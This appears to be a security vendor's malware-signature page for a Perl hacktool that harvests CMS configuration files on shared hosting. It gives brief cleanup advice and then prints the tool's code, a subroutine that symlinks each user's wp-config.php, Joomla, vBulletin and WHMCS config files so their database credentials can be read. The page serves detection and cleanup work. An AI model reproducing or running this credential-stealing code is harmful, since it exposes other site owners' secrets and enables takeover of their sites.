Malware Signatures

  1. Home
  2. Malware Signatures
  3. pl.hacktool.configuration_stealer.002

pl.hacktool.configuration_stealer.002

Hacktools are specially crafted tools to perform malicious or illicit activities, such as controlling botnets, mining bitcoins, triggering Denial-of-Service attacks and bruteforcing passwords. Those tools most of the time hidden in the filesystem and were installed among with other malicious code throug a vulnerability or an already compromised server.
This backdoor scans the whole server looking for configuration files for the most common CMSs, then creating a symlink where the attacker can inspect and use the data gathered to attack the other sites.

Affecting

Any vulnerable based website with perl support. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your server looking for any unknown perl file and remove them. Also, you can sign up with us and let our team remove the malware for you.

Dump


sub lil{
($user) = @_;
$msr = qx{pwd};
$kola=$msr."/".$user;
$kola=~s/n//g;
symlink('/home/'.$user.'/public_html/vb/includes/config.php',$kola.'.txt');
symlink('/home/'.$user.'/public_html/includes/config.php',$kola.'1.txt');
symlink('/home/'.$user.'/public_html/config.php',$kola.'2.txt');
symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'3.txt');
symlink('/home/'.$user.'/public_html/admin/conf.php',$kola.'5.txt');
symlink('/home/'.$user.'/public_html/admin/config.php',$kola.'4.txt');
symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'13.txt');
symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'14.txt');
symlink('/home/'.$user.'/public_html/conf_global.php',$kola.'6.txt');
symlink('/home/'.$user.'/public_html/include/db.php',$kola.'7.txt');
symlink('/home/'.$user.'/public_html/connect.php',$kola.'8.txt');
symlink('/home/'.$user.'/public_html/mk_conf.php',$kola.'9.txt');
symlink('/home/'.$user.'/public_html/configuration.php',$kola.'10.txt');
symlink('/home/'.$user.'/public_html/include/config.php',$kola.'12.txt');
symlink('/home/'.$user.'/public_html/joomla/configuration.php',$kola.'11.txt');
symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'15.txt');
symlink('/home/'.$user.'/public_html/whmc/configuration.php',$kola.'16.txt');
symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'17.txt');